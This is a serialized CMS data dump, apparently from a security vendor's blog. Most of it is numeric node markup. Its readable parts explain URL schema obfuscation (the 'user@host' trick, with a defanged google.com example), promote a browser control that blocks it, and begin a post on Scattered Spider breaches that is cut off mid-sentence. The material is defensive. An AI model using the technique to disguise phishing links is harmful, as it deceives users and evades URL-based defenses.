2},{},[99473],{"nodeType":173,"value":96639,"marks":99474,"data":99475},[],{},{"nodeType":178,"data":99477,"content":99478},{},[99479,99482,99489],{"nodeType":173,"value":96646,"marks":99480,"data":99481},[],{},{"nodeType":186,"data":99483,"content":99484},{"uri":96651},[99485],{"nodeType":173,"value":96654,"marks":99486,"data":99488},[99487],{"type":194},{},{"nodeType":173,"value":96659,"marks":99490,"data":99491},[],{},{"nodeType":178,"data":99493,"content":99494},{},[99495],{"nodeType":173,"value":96666,"marks":99496,"data":99497},[],{},{"nodeType":312,"data":99499,"content":99502},{"target":99500},{"sys":99501},{"id":96673,"type":317,"linkType":318},[],{"nodeType":231,"data":99504,"content":99505},{},[],{"nodeType":169,"data":99507,"content":99508},{},[99509],{"nodeType":173,"value":96682,"marks":99510,"data":99512},[99511],{"type":370},{},{"nodeType":178,"data":99514,"content":99515},{},[99516],{"nodeType":173,"value":96690,"marks":99517,"data":99518},[],{},{"nodeType":250,"data":99520,"content":99521},{},[99522,99531,99540,99549],{"nodeType":254,"data":99523,"content":99524},{},[99525],{"nodeType":178,"data":99526,"content":99527},{},[99528],{"nodeType":173,"value":96703,"marks":99529,"data":99530},[],{},{"nodeType":254,"data":99532,"content":99533},{},[99534],{"nodeType":178,"data":99535,"content":99536},{},[99537],{"nodeType":173,"value":96713,"marks":99538,"data":99539},[],{},{"nodeType":254,"data":99541,"content":99542},{},[99543],{"nodeType":178,"data":99544,"content":99545},{},[99546],{"nodeType":173,"value":96723,"marks":99547,"data":99548},[],{},{"nodeType":254,"data":99550,"content":99551},{},[99552],{"nodeType":178,"data":99553,"content":99554},{},[99555,99558,99565,99568,99575],{"nodeType":173,"value":96733,"marks":99556,"data":99557},[],{},{"nodeType":186,"data":99559,"content":99560},{"uri":96738},[99561],{"nodeType":173,"value":96741,"marks":99562,"data":99564},[99563],{"type":194},{},{"nodeType":173,"value":96746,"marks":99566,"data":99567},[],{},{"nodeType":186,"data":99569,"content":99570},{"uri":96751},[99571],{"nodeType":173,"value":96754,"marks":99572,"data":99574},[99573],{"type":194},{},{"nodeType":173,"value":481,"marks":99576,"data":99577},[],{},{"nodeType":178,"data":99579,"content":99580},{},[99581],{"nodeType":173,"value":96765,"marks":99582,"data":99583},[],{},{"nodeType":231,"data":99585,"content":99586},{},[],{"nodeType":169,"data":99588,"content":99589},{},[99590],{"nodeType":173,"value":96775,"marks":99591,"data":99593},[99592],{"type":370},{},{"nodeType":178,"data":99595,"content":99596},{},[99597],{"nodeType":173,"value":96783,"marks":99598,"data":99599},[],{},{"nodeType":178,"data":99601,"content":99602},{},[99603],{"nodeType":173,"value":96790,"marks":99604,"data":99605},[],{},{"nodeType":250,"data":99607,"content":99608},{},[99609,99628,99657,99676],{"nodeType":254,"data":99610,"content":99611},{},[99612],{"nodeType":178,"data":99613,"content":99614},{},[99615,99618,99625],{"nodeType":173,"value":96803,"marks":99616,"data":99617},[],{},{"nodeType":186,"data":99619,"content":99620},{"uri":59347},[99621],{"nodeType":173,"value":59350,"marks":99622,"data":99624},[99623],{"type":194},{},{"nodeType":173,"value":96814,"marks":99626,"data":99627},[],{},{"nodeType":254,"data":99629,"content":99630},{},[99631],{"nodeType":178,"data":99632,"content":99633},{},[99634,99637,99644,99647,99654],{"nodeType":173,"value":37,"marks":99635,"data":99636},[],{},{"nodeType":186,"data":99638,"content":99639},{"uri":19838},[99640],{"nodeType":173,"value":39940,"marks":99641,"data":99643},[99642],{"type":194},{},{"nodeType":173,"value":61650,"marks":99645,"data":99646},[],{},{"nodeType":186,"data":99648,"content":99649},{"uri":61655},[99650],{"nodeType":173,"value":61658,"marks":99651,"data":99653},[99652],{"type":194},{},{"nodeType":173,"value":61663,"marks":99655,"data":99656},[],{},{"nodeType":254,"data":99658,"content":99659},{},[99660],{"nodeType":178,"data":99661,"content":99662},{},[99663,99666,99673],{"nodeType":173,"value":37,"marks":99664,"data":99665},[],{},{"nodeType":186,"data":99667,"content":99668},{"uri":9275},[99669],{"nodeType":173,"value":9278,"marks":99670,"data":99672},[99671],{"type":194},{},{"nodeType":173,"value":61683,"marks":99674,"data":99675},[],{},{"nodeType":254,"data":99677,"content":99678},{},[99679],{"nodeType":178,"data":99680,"content":99681},{},[99682,99685,99692,99695,99702],{"nodeType":173,"value":37,"marks":99683,"data":99684},[],{},{"nodeType":186,"data":99686,"content":99687},{"uri":61697},[99688],{"nodeType":173,"value":57951,"marks":99689,"data":99691},[99690],{"type":194},{},{"nodeType":173,"value":61704,"marks":99693,"data":99694},[],{},{"nodeType":186,"data":99696,"content":99697},{"uri":61709},[99698],{"nodeType":173,"value":61712,"marks":99699,"data":99701},[99700],{"type":194},{},{"nodeType":173,"value":61717,"marks":99703,"data":99704},[],{},{"nodeType":178,"data":99706,"content":99707},{},[99708],{"nodeType":173,"value":96898,"marks":99709,"data":99710},[],{},{"nodeType":231,"data":99712,"content":99713},{},[],{"nodeType":169,"data":99715,"content":99716},{},[99717],{"nodeType":173,"value":40632,"marks":99718,"data":99720},[99719],{"type":370},{},{"nodeType":178,"data":99722,"content":99723},{},[99724,99727,99734,99737,99744],{"nodeType":173,"value":96915,"marks":99725,"data":99726},[],{},{"nodeType":186,"data":99728,"content":99729},{"uri":832},[99730],{"nodeType":173,"value":835,"marks":99731,"data":99733},[99732],{"type":194},{},{"nodeType":173,"value":96926,"marks":99735,"data":99736},[],{},{"nodeType":186,"data":99738,"content":99739},{"uri":61157},[99740],{"nodeType":173,"value":39789,"marks":99741,"data":99743},[99742],{"type":194},{},{"nodeType":173,"value":96937,"marks":99745,"data":99746},[],{},{"nodeType":178,"data":99748,"content":99749},{},[99750],{"nodeType":173,"value":96944,"marks":99751,"data":99752},[],{},{"nodeType":231,"data":99754,"content":99755},{},[],{"nodeType":169,"data":99757,"content":99758},{},[99759],{"nodeType":173,"value":8299,"marks":99760,"data":99762},[99761],{"type":370},{},{"nodeType":178,"data":99764,"content":99765},{},[99766],{"nodeType":173,"value":96961,"marks":99767,"data":99768},[],{},{"nodeType":178,"data":99770,"content":99771},{},[99772,99775,99782],{"nodeType":173,"value":96968,"marks":99773,"data":99774},[],{},{"nodeType":186,"data":99776,"content":99777},{"uri":96973},[99778],{"nodeType":173,"value":96976,"marks":99779,"data":99781},[99780],{"type":194},{},{"nodeType":173,"value":96981,"marks":99783,"data":99784},[],{},{"nodeType":178,"data":99786,"content":99787},{},[99788],{"nodeType":173,"value":96988,"marks":99789,"data":99790},[],{},{"nodeType":231,"data":99792,"content":99793},{},[],{"nodeType":169,"data":99795,"content":99796},{},[99797],{"nodeType":173,"value":1422,"marks":99798,"data":99800},[99799],{"type":370},{},{"nodeType":178,"data":99802,"content":99803},{},[99804],{"nodeType":173,"value":97005,"marks":99805,"data":99806},[],{},{"nodeType":312,"data":99808,"content":99811},{"target":99809},{"sys":99810},{"id":97012,"type":317,"linkType":318},[],{"nodeType":178,"data":99813,"content":99814},{},[99815],{"nodeType":173,"value":97018,"marks":99816,"data":99817},[],{},{"nodeType":312,"data":99819,"content":99822},{"target":99820},{"sys":99821},{"id":97025,"type":317,"linkType":318},[],{"nodeType":178,"data":99824,"content":99825},{},[99826],{"nodeType":173,"value":97031,"marks":99827,"data":99828},[],{},{"nodeType":250,"data":99830,"content":99831},{},[99832,99851],{"nodeType":254,"data":99833,"content":99834},{},[99835],{"nodeType":178,"data":99836,"content":99837},{},[99838,99841,99848],{"nodeType":173,"value":37,"marks":99839,"data":99840},[],{},{"nodeType":186,"data":99842,"content":99843},{"uri":96586},[99844],{"nodeType":173,"value":96589,"marks":99845,"data":99847},[99846],{"type":194},{},{"nodeType":173,"value":37,"marks":99849,"data":99850},[],{},{"nodeType":254,"data":99852,"content":99853},{},[99854],{"nodeType":178,"data":99855,"content":99856},{},[99857,99860,99867],{"nodeType":173,"value":37,"marks":99858,"data":99859},[],{},{"nodeType":186,"data":99861,"content":99862},{"uri":97067},[99863],{"nodeType":173,"value":97070,"marks":99864,"data":99866},[99865],{"type":194},{},{"nodeType":173,"value":37,"marks":99868,"data":99869},[],{},{"nodeType":178,"data":99871,"content":99872},{},[99873],{"nodeType":173,"value":97081,"marks":99874,"data":99875},[],{},{"nodeType":178,"data":99877,"content":99878},{},[99879],{"nodeType":173,"value":97088,"marks":99880,"data":99881},[],{},{"nodeType":231,"data":99883,"content":99884},{},[],{"nodeType":169,"data":99886,"content":99887},{},[99888],{"nodeType":173,"value":97098,"marks":99889,"data":99891},[99890],{"type":370},{},{"nodeType":178,"data":99893,"content":99894},{},[99895],{"nodeType":173,"value":97106,"marks":99896,"data":99897},[],{},{"nodeType":178,"data":99899,"content":99900},{},[99901,99904,99911],{"nodeType":173,"value":61741,"marks":99902,"data":99903},[],{},{"nodeType":186,"data":99905,"content":99906},{"uri":97117},[99907],{"nodeType":173,"value":1472,"marks":99908,"data":99910},[99909],{"type":194},{},{"nodeType":173,"value":1477,"marks":99912,"data":99913},[],{},{"items":99915},[99916,99918],{"sys":99917,"name":505},{"id":504},{"sys":99919,"name":509},{"id":508},{"items":99921},[99922],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":99923},{"url":1496},{"__typename":1528,"sys":99925,"content":99926,"title":93520,"synopsis":93521,"hashTags":118,"publishedDate":93522,"slug":93523,"tagsCollection":100467,"authorsCollection":100473},{"id":92907},{"json":99927},{"nodeType":165,"data":99928,"content":99929},{},[99930,99936,99942,99949,99972,99978,99983,99986,99993,99999,100005,100044,100050,100056,100059,100066,100072,100078,100084,100100,100106,100111,100118,100124,100130,100136,100141,100144,100151,100158,100164,100171,100177,100235,100241,100248,100254,100284,100291,100297,100304,100310,100317,100323,100371,100377,100380,100387,100393,100408,100438,100456,100461],{"nodeType":178,"data":99931,"content":99932},{},[99933],{"nodeType":173,"value":92916,"marks":99934,"data":99935},[],{},{"nodeType":178,"data":99937,"content":99938},{},[99939],{"nodeType":173,"value":92923,"marks":99940,"data":99941},[],{},{"nodeType":178,"data":99943,"content":99944},{},[99945],{"nodeType":173,"value":92930,"marks":99946,"data":99948},[99947],{"type":370},{},{"nodeType":178,"data":99950,"content":99951},{},[99952,99955,99962,99965,99969],{"nodeType":173,"value":92938,"marks":99953,"data":99954},[],{},{"nodeType":186,"data":99956,"content":99957},{"uri":92943},[99958],{"nodeType":173,"value":92946,"marks":99959,"data":99961},[99960],{"type":194},{},{"nodeType":173,"value":92951,"marks":99963,"data":99964},[],{},{"nodeType":173,"value":92955,"marks":99966,"data":99968},[99967],{"type":1646},{},{"nodeType":173,"value":92960,"marks":99970,"data":99971},[],{},{"nodeType":178,"data":99973,"content":99974},{},[99975],{"nodeType":173,"value":92967,"marks":99976,"data":99977},[],{},{"nodeType":312,"data":99979,"content":99982},{"target":99980},{"sys":99981},{"id":92974,"type":317,"linkType":318},[],{"nodeType":231,"data":99984,"content":99985},{},[],{"nodeType":169,"data":99987,"content":99988},{},[99989],{"nodeType":173,"value":92983,"marks":99990,"data":99992},[99991],{"type":370},{},{"nodeType":178,"data":99994,"content":99995},{},[99996],{"nodeType":173,"value":92991,"marks":99997,"data":99998},[],{},{"nodeType":178,"data":100000,"content":100001},{},[100002],{"nodeType":173,"value":92998,"marks":100003,"data":100004},[],{},{"nodeType":250,"data":100006,"content":100007},{},[100008,100017,100026,100035],{"nodeType":254,"data":100009,"content":100010},{},[100011],{"nodeType":178,"data":100012,"content":100013},{},[100014],{"nodeType":173,"value":93011,"marks":100015,"data":100016},[],{},{"nodeType":254,"data":100018,"content":100019},{},[100020],{"nodeType":178,"data":100021,"content":100022},{},[100023],{"nodeType":173,"value":93021,"marks":100024,"data":100025},[],{},{"nodeType":254,"data":100027,"content":100028},{},[100029],{"nodeType":178,"data":100030,"content":100031},{},[100032],{"nodeType":173,"value":93031,"marks":100033,"data":100034},[],{},{"nodeType":254,"data":100036,"content":100037},{},[100038],{"nodeType":178,"data":100039,"content":100040},{},[100041],{"nodeType":173,"value":93041,"marks":100042,"data":100043},[],{},{"nodeType":178,"data":100045,"content":100046},{},[100047],{"nodeType":173,"value":93048,"marks":100048,"data":100049},[],{},{"nodeType":178,"data":100051,"content":100052},{},[100053],{"nodeType":173,"value":93055,"marks":100054,"data":100055},[],{},{"nodeType":231,"data":100057,"content":100058},{},[],{"nodeType":169,"data":100060,"content":100061},{},[100062],{"nodeType":173,"value":93065,"marks":100063,"data":100065},[100064],{"type":370},{},{"nodeType":178,"data":100067,"content":100068},{},[100069],{"nodeType":173,"value":93073,"marks":100070,"data":100071},[],{},{"nodeType":178,"data":100073,"content":100074},{},[100075],{"nodeType":173,"value":93080,"marks":100076,"data":100077},[],{},{"nodeType":178,"data":100079,"content":100080},{},[100081],{"nodeType":173,"value":93087,"marks":100082,"data":100083},[],{},{"nodeType":178,"data":100085,"content":100086},{},[100087,100090,100097],{"nodeType":173,"value":93094,"marks":100088,"data":100089},[],{},{"nodeType":186,"data":100091,"content":100092},{"uri":27726},[100093],{"nodeType":173,"value":27729,"marks":100094,"data":100096},[100095],{"type":194},{},{"nodeType":173,"value":93105,"marks":100098,"data":100099},[],{},{"nodeType":178,"data":100101,"content":100102},{},[100103],{"nodeType":173,"value":93112,"marks":100104,"data":100105},[],{},{"nodeType":312,"data":100107,"content":100110},{"target":100108},{"sys":100109},{"id":93119,"type":317,"linkType":318},[],{"nodeType":169,"data":100112,"content":100113},{},[100114],{"nodeType":173,"value":93125,"marks":100115,"data":100117},[100116],{"type":370},{},{"nodeType":178,"data":100119,"content":100120},{},[100121],{"nodeType":173,"value":93133,"marks":100122,"data":100123},[],{},{"nodeType":178,"data":100125,"content":100126},{},[100127],{"nodeType":173,"value":93140,"marks":100128,"data":100129},[],{},{"nodeType":178,"data":100131,"content":100132},{},[100133],{"nodeType":173,"value":93147,"marks":100134,"data":100135},[],{},{"nodeType":312,"data":100137,"content":100140},{"target":100138},{"sys":100139},{"id":93154,"type":317,"linkType":318},[],{"nodeType":231,"data":100142,"content":100143},{},[],{"nodeType":169,"data":100145,"content":100146},{},[100147],{"nodeType":173,"value":93163,"marks":100148,"data":100150},[100149],{"type":370},{},{"nodeType":235,"data":100152,"content":100153},{},[100154],{"nodeType":173,"value":93171,"marks":100155,"data":100157},[100156],{"type":370},{},{"nodeType":178,"data":100159,"content":100160},{},[100161],{"nodeType":173,"value":93179,"marks":100162,"data":100163},[],{},{"nodeType":235,"data":100165,"content":100166},{},[100167],{"nodeType":173,"value":93186,"marks":100168,"data":100170},[100169],{"type":370},{},{"nodeType":178,"data":100172,"content":100173},{},[100174],{"nodeType":173,"value":93194,"marks":100175,"data":100176},[],{},{"nodeType":250,"data":100178,"content":100179},{},[100180,100189,100198,100217,100226],{"nodeType":254,"data":100181,"content":100182},{},[100183],{"nodeType":178,"data":100184,"content":100185},{},[100186],{"nodeType":173,"value":93207,"marks":100187,"data":100188},[],{},{"nodeType":254,"data":100190,"content":100191},{},[100192],{"nodeType":178,"data":100193,"content":100194},{},[100195],{"nodeType":173,"value":93217,"marks":100196,"data":100197},[],{},{"nodeType":254,"data":100199,"content":100200},{},[100201],{"nodeType":178,"data":100202,"content":100203},{},[100204,100207,100214],{"nodeType":173,"value":74365,"marks":100205,"data":100206},[],{},{"nodeType":186,"data":100208,"content":100209},{"uri":74370},[100210],{"nodeType":173,"value":74373,"marks":100211,"data":100213},[100212],{"type":194},{},{"nodeType":173,"value":37,"marks":100215,"data":100216},[],{},{"nodeType":254,"data":100218,"content":100219},{},[100220],{"nodeType":178,"data":100221,"content":100222},{},[100223],{"nodeType":173,"value":93246,"marks":100224,"data":100225},[],{},{"nodeType":254,"data":100227,"content":100228},{},[100229],{"nodeType":178,"data":100230,"content":100231},{},[100232],{"nodeType":173,"value":93256,"marks":100233,"data":100234},[],{},{"nodeType":178,"data":100236,"content":100237},{},[100238],{"nodeType":173,"value":93263,"marks":100239,"data":100240},[],{},{"nodeType":235,"data":100242,"content":100243},{},[100244],{"nodeType":173,"value":93270,"marks":100245,"data":100247},[100246],{"type":370},{},{"nodeType":178,"data":100249,"content":100250},{},[100251],{"nodeType":173,"value":93278,"marks":100252,"data":100253},[],{},{"nodeType":250,"data":100255,"content":100256},{},[100257,100266,100275],{"nodeType":254,"data":100258,"content":100259},{},[100260],{"nodeType":178,"data":100261,"content":100262},{},[100263],{"nodeType":173,"value":93291,"marks":100264,"data":100265},[],{},{"nodeType":254,"data":100267,"content":100268},{},[100269],{"nodeType":178,"data":100270,"content":100271},{},[100272],{"nodeType":173,"value":93301,"marks":100273,"data":100274},[],{},{"nodeType":254,"data":100276,"content":100277},{},[100278],{"nodeType":178,"data":100279,"content":100280},{},[100281],{"nodeType":173,"value":93311,"marks":100282,"data":100283},[],{},{"nodeType":235,"data":100285,"content":100286},{},[100287],{"nodeType":173,"value":93318,"marks":100288,"data":100290},[100289],{"type":370},{},{"nodeType":178,"data":100292,"content":100293},{},[100294],{"nodeType":173,"value":93326,"marks":100295,"data":100296},[],{},{"nodeType":235,"data":100298,"content":100299},{},[100300],{"nodeType":173,"value":93333,"marks":100301,"data":100303},[100302],{"type":370},{},{"nodeType":178,"data":100305,"content":100306},{},[100307],{"nodeType":173,"value":93341,"marks":100308,"data":100309},[],{},{"nodeType":235,"data":100311,"content":100312},{},[100313],{"nodeType":173,"value":93348,"marks":100314,"data":100316},[100315],{"type":370},{},{"nodeType":178,"data":100318,"content":100319},{},[100320],{"nodeType":173,"value":93356,"marks":100321,"data":100322},[],{},{"nodeType":250,"data":100324,"content":100325},{},[100326,100335,100344,100353,100362],{"nodeType":254,"data":100327,"content":100328},{},[100329],{"nodeType":178,"data":100330,"content":100331},{},[100332],{"nodeType":173,"value":93369,"marks":100333,"data":100334},[],{},{"nodeType":254,"data":100336,"content":100337},{},[100338],{"nodeType":178,"data":100339,"content":100340},{},[100341],{"nodeType":173,"value":93379,"marks":100342,"data":100343},[],{},{"nodeType":254,"data":100345,"content":100346},{},[100347],{"nodeType":178,"data":100348,"content":100349},{},[100350],{"nodeType":173,"value":93389,"marks":100351,"data":100352},[],{},{"nodeType":254,"data":100354,"content":100355},{},[100356],{"nodeType":178,"data":100357,"content":100358},{},[100359],{"nodeType":173,"value":93399,"marks":100360,"data":100361},[],{},{"nodeType":254,"data":100363,"content":100364},{},[100365],{"nodeType":178,"data":100366,"content":100367},{},[100368],{"nodeType":173,"value":93409,"marks":100369,"data":100370},[],{},{"nodeType":178,"data":100372,"content":100373},{},[100374],{"nodeType":173,"value":93416,"marks":100375,"data":100376},[],{},{"nodeType":231,"data":100378,"content":100379},{},[],{"nodeType":169,"data":100381,"content":100382},{},[100383],{"nodeType":173,"value":93426,"marks":100384,"data":100386},[100385],{"type":370},{},{"nodeType":178,"data":100388,"content":100389},{},[100390],{"nodeType":173,"value":93434,"marks":100391,"data":100392},[],{},{"nodeType":178,"data":100394,"content":100395},{},[100396,100399,100405],{"nodeType":173,"value":93441,"marks":100397,"data":100398},[],{},{"nodeType":186,"data":100400,"content":100401},{"uri":92943},[100402],{"nodeType":173,"value":93448,"marks":100403,"data":100404},[],{},{"nodeType":173,"value":1477,"marks":100406,"data":100407},[],{},{"nodeType":250,"data":100409,"content":100410},{},[100411,100420,100429],{"nodeType":254,"data":100412,"content":100413},{},[100414],{"nodeType":178,"data":100415,"content":100416},{},[100417],{"nodeType":173,"value":93464,"marks":100418,"data":100419},[],{},{"nodeType":254,"data":100421,"content":100422},{},[100423],{"nodeType":178,"data":100424,"content":100425},{},[100426],{"nodeType":173,"value":93474,"marks":100427,"data":100428},[],{},{"nodeType":254,"data":100430,"content":100431},{},[100432],{"nodeType":178,"data":100433,"content":100434},{},[100435],{"nodeType":173,"value":93484,"marks":100436,"data":100437},[],{},{"nodeType":178,"data":100439,"content":100440},{},[100441,100445,100452],{"nodeType":173,"value":93491,"marks":100442,"data":100444},[100443],{"type":370},{},{"nodeType":186,"data":100446,"content":100447},{"uri":473},[100448],{"nodeType":173,"value":93499,"marks":100449,"data":100451},[100450],{"type":370},{},{"nodeType":173,"value":93504,"marks":100453,"data":100455},[100454],{"type":370},{},{"nodeType":312,"data":100457,"content":100460},{"target":100458},{"sys":100459},{"id":93512,"type":317,"linkType":318},[],{"nodeType":178,"data":100462,"content":100463},{},[100464],{"nodeType":173,"value":37,"marks":100465,"data":100466},[],{},{"items":100468},[100469,100471],{"sys":100470,"name":505},{"id":504},{"sys":100472,"name":509},{"id":508},{"items":100474},[100475],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":100476},{"url":25597},{"items":100478},[100479],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":100480},{"url":1496},{"json":100482,"links":100663},{"data":100483,"content":100484,"nodeType":165},{},[100485,100502,100509,100530,100537,100560,100579,100582,100590,100597,100604,100611,100617,100624,100630,100633,100640,100646],{"data":100486,"content":100487,"nodeType":178},{},[100488,100492,100498],{"data":100489,"marks":100490,"value":100491,"nodeType":173},{},[],"URL schema obfuscation is a technique that obfuscates the end destination of a URL by abusing the URL schema. It used to be common for pages using basic authentication to accept a username and password provided in the URL: for example, hxxps://",{"data":100493,"marks":100494,"value":100497,"nodeType":173},{},[100495,100496],{"type":370},{"type":194},"username:password",{"data":100499,"marks":100500,"value":100501,"nodeType":173},{},[],"@pushsecurity.com. ",{"data":100503,"content":100504,"nodeType":178},{},[100505],{"data":100506,"marks":100507,"value":100508,"nodeType":173},{},[],"The functionality is still supported by browsers, though it is rarely used today. Now, when a browser interprets a URL with the username section populated (anything before the \"@” sign), it discards it, and sends the request to the page or server following the \"@” sign. ",{"data":100510,"content":100511,"nodeType":178},{},[100512,100516,100521,100526],{"data":100513,"marks":100514,"value":100515,"nodeType":173},{},[],"This can be abused by attackers to send their victim to a malicious server IP or page URL after an initial legit-looking URL. So, for example: hxxps://google.com",{"data":100517,"marks":100518,"value":100520,"nodeType":173},{},[100519],{"type":370},"@",{"data":100522,"marks":100523,"value":61140,"nodeType":173},{},[100524,100525],{"type":370},{"type":194},{"data":100527,"marks":100528,"value":100529,"nodeType":173},{},[],". The destination page is then often further obfuscated through encoding to further disguise the malicious link. ",{"data":100531,"content":100532,"nodeType":178},{},[100533],{"data":100534,"marks":100535,"value":100536,"nodeType":173},{},[],"URL schema obfuscation has two main benefits for an attacker:",{"data":100538,"content":100539,"nodeType":250},{},[100540,100550],{"data":100541,"content":100542,"nodeType":254},{},[100543],{"data":100544,"content":100545,"nodeType":178},{},[100546],{"data":100547,"marks":100548,"value":100549,"nodeType":173},{},[],"It increases the likelihood that a victim clicks a link by appearing legitimate at a glance.",{"data":100551,"content":100552,"nodeType":254},{},[100553],{"data":100554,"content":100555,"nodeType":178},{},[100556],{"data":100557,"marks":100558,"value":100559,"nodeType":173},{},[],"Common URL parsing logic often fails when encountering this technique. This means that where a network defense tool is relying on knowing the server/page a URL is pointing to (e.g. checking if a domain is on a threat intel feed), it could potentially bypass it.",{"data":100561,"content":100562,"nodeType":178},{},[100563,100567,100575],{"data":100564,"marks":100565,"value":100566,"nodeType":173},{},[],"VirusTotal shows abuse of this technique dating back to at least February 2022, and we’re still encountering it in the wild today. After seeing an uptick in URL obfuscation pages being intercepted by ",{"data":100568,"content":100569,"nodeType":186},{"uri":9120},[100570],{"data":100571,"marks":100572,"value":100574,"nodeType":173},{},[100573],{"type":194},"Push’s other browser-based phishing protection controls",{"data":100576,"marks":100577,"value":100578,"nodeType":173},{},[],", we decided to use our position in the browser to roll out an additional layer of protection against this technique. ",{"data":100580,"content":100581,"nodeType":231},{},[],{"data":100583,"content":100584,"nodeType":169},{},[100585],{"data":100586,"marks":100587,"value":100589,"nodeType":173},{},[100588],{"type":370},"Block URL obfuscation in the browser",{"data":100591,"content":100592,"nodeType":178},{},[100593],{"data":100594,"marks":100595,"value":100596,"nodeType":173},{},[],"We’re providing Push customers with the ability to outright block schema obfuscation when it’s encountered in the browser, protecting against attackers using this technique to obfuscate their phishing and malware delivery pages/servers. ",{"data":100598,"content":100599,"nodeType":178},{},[100600],{"data":100601,"marks":100602,"value":100603,"nodeType":173},{},[],"No matter where the link originates, Push intercepts it at the point of execution in the browser, and shuts the attack down. ",{"data":100605,"content":100606,"nodeType":178},{},[100607],{"data":100608,"marks":100609,"value":100610,"nodeType":173},{},[],"Here’s how it works:",{"data":100612,"content":100616,"nodeType":312},{"target":100613},{"sys":100614},{"id":100615,"type":317,"linkType":318},"35dUsivrKA5tNINGmaNfdb",[],{"data":100618,"content":100619,"nodeType":178},{},[100620],{"data":100621,"marks":100622,"value":100623,"nodeType":173},{},[],"To enable the control, simply hit the toggle under “URL blocking” from the Push dashboard. ",{"data":100625,"content":100629,"nodeType":312},{"target":100626},{"sys":100627},{"id":100628,"type":317,"linkType":318},"A6Zz23b8mIdAaQnl99lQn",[],{"data":100631,"content":100632,"nodeType":231},{},[],{"data":100634,"content":100635,"nodeType":169},{},[100636],{"data":100637,"marks":100638,"value":18605,"nodeType":173},{},[100639],{"type":370},{"data":100641,"content":100642,"nodeType":178},{},[100643],{"data":100644,"marks":100645,"value":61734,"nodeType":173},{},[],{"data":100647,"content":100648,"nodeType":178},{},[100649,100652,100660],{"data":100650,"marks":100651,"value":61741,"nodeType":173},{},[],{"data":100653,"content":100655,"nodeType":186},{"uri":100654},"https://pushsecurity.com/demo/?utm_campaign=12883224-FY25Q2_Scattered-Spider&utm_source=bleepingcomputer&utm_content=sponsored-article",[100656],{"data":100657,"marks":100658,"value":1472,"nodeType":173},{},[100659],{"type":194},{"data":100661,"marks":100662,"value":1477,"nodeType":173},{},[],{"entries":100664},{"hyperlink":100665,"inline":100666,"block":100667},[],[],[100668,100671],{"sys":100669,"__typename":5434,"title":100589,"arcadeDemoUrl":100670,"playText":27947},{"id":100615},"https://demo.arcade.software/wAgMRhKeX2heQPyUh8tK?embed",{"sys":100672,"__typename":5345,"title":100673,"caption":100674,"layoutMode":118,"file":100675},{"id":100628},"Enable URL schema obfuscation","URL obfuscation blocking can be enabled with a simple toggle. ",{"url":100676,"width":100677,"height":100678},"https://images.ctfassets.net/y1cdw1ablpvd/7ypmTNXQSaVW961uwCilOH/e2b3c04a1fb38d9adae6a1528332bafa/Screenshot_2025-07-01_at_09.00.23.png",1454,398,"content:blog:detecting-phishing-pages-using-obfuscated-url-destinations.json","blog/detecting-phishing-pages-using-obfuscated-url-destinations.json","blog/detecting-phishing-pages-using-obfuscated-url-destinations",{"_path":100683,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":100684,"summary":100687,"title":100698,"subtitle":118,"metaTitle":100699,"synopsis":100700,"hashTags":118,"publishedDate":100701,"slug":100702,"ogImage":100703,"tagsCollection":100705,"relatedBlogPostsCollection":100711,"authorsCollection":102206,"content":102210,"_id":103015,"_type":5439,"_source":5440,"_file":103016,"_stem":103017,"_extension":5439},"/blog/key-takeaways-from-the-scattered-spider-attacks-on-insurance-firms",{"id":100685,"publishedAt":100686},"3JS30QKx42bLnGYZh5K9ZP","2025-11-13T19:48:04.209Z",{"json":100688},{"data":100689,"content":100690,"nodeType":165},{},[100691],{"data":100692,"content":100693,"nodeType":178},{},[100694],{"data":100695,"marks":100696,"value":100697,"nodeType":173},{},[],"Scattered Spider continues to dominate the headlines, with the latest news linking the hackers to attacks on U.S. insurance giant Aflac, Philadelphia Insurance Companies, Erie Insurance, Hawaiian Airlines, WestJet, and Qantas. Here's what you need to know to defend your organization. ","3 key takeaways from the Scattered Spider attacks on aviation & insurance firms","Scattered Spider target aviation & insurance firms","Scattered Spider continues to dominate the headlines, with attacks on aviation and insurance companies worldwide.","2025-06-30T00:00:00.000Z","key-takeaways-from-the-scattered-spider-attacks-on-insurance-firms",{"url":100704},"https://images.ctfassets.net/y1cdw1ablpvd/mMbgUER8qJH3p4YF8CsAE/cfc45da4f29fb417a627be97335ab23e/Help_desk_verification_codes.png",{"items":100706},[100707,100709],{"sys":100708,"name":505},{"id":504},{"sys":100710,"name":509},{"id":508},{"items":100712},[100713,101348,101653],{"__typename":1528,"sys":100714,"content":100716,"title":101334,"synopsis":101335,"hashTags":118,"publishedDate":101336,"slug":101337,"tagsCollection":101338,"authorsCollection":101344},{"id":100715},"3ExexM6DB2QBOQrtbMrXnN",{"json":100717},{"nodeType":165,"data":100718,"content":100719},{},[100720,100726,100758,100850,100927,100934,100937,100944,100951,100958,100974,100981,100988,100991,100998,101005,101012,101045,101052,101075,101082,101085,101092,101099,101117,101202,101209,101214,101217,101224,101231,101238,101244,101264,101269,101276,101279,101285,101305,101322,101328],{"nodeType":312,"data":100721,"content":100725},{"target":100722},{"sys":100723},{"id":100724,"type":317,"linkType":318},"6BjaSruVecmhn1NoHreRni",[],{"nodeType":178,"data":100727,"content":100728},{},[100729,100733,100742,100745,100754],{"nodeType":173,"value":100730,"marks":100731,"data":100732},"Scattered Spider have been busy. Major breaches of UK retailers ",[],{},{"nodeType":186,"data":100734,"content":100736},{"uri":100735},"https://www.bleepingcomputer.com/news/security/mands-says-customer-data-stolen-in-cyberattack-forces-password-resets/",[100737],{"nodeType":173,"value":100738,"marks":100739,"data":100741},"Marks and Spencer",[100740],{"type":194},{},{"nodeType":173,"value":933,"marks":100743,"data":100744},[],{},{"nodeType":186,"data":100746,"content":100748},{"uri":100747},"https://www.bleepingcomputer.com/news/security/co-op-confirms-data-theft-after-dragonforce-ransomware-claims-attack/",[100749],{"nodeType":173,"value":100750,"marks":100751,"data":100753},"Co-op",[100752],{"type":194},{},{"nodeType":173,"value":100755,"marks":100756,"data":100757}," resulted in the loss of sensitive data and prolonged disruption to in-store and digital services, with M&S feeling the pain of £300m in lost profits and a share value hit approaching £1b, and a multimillion-pound class action lawsuit and possible ICO fines 